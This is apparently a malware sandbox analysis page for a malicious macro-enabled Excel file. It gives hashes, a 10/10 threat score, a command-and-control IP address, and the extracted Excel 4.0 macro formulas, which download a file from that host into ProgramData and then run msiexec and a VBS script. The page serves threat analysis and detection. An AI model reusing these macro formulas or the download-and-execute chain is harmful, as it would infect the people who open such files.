Overview

overview

10

Static

static

10

032a569703...4.xlsm

windows7-x64

10

032a569703...4.xlsm

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    032a5697035a48f0e24ca1392ae29184

  • Size

    6KB

  • MD5

    032a5697035a48f0e24ca1392ae29184

  • SHA1

    dfeedf21be3347389bfab1db916b9a2fdfa9a750

  • SHA256

    572629297a35602d305f8d1834349aea5f2fcce78daf4037d0f92020cf0061b7

  • SHA512

    531d369c230337db6d58148009eeee706d9dd15231afd5de24b3b8484ec5540af111cb1ce7045d82c488cec70cf99bfec19d953425732d0114672a59dfd99b22

  • SSDEEP

    192:NDSruSj1aEOmmfRg8UhHFBFYu+b98yQ6pc:NAuWwy1FYbb98yQsc

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187

Attributes
  • formulas

    =EXEC("msiexec.exe") =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0) =EXEC("wscript C:\ProgramData\start.vbs") =HALT()

Signatures

Files

  • 032a5697035a48f0e24ca1392ae29184
    .xlsm office2007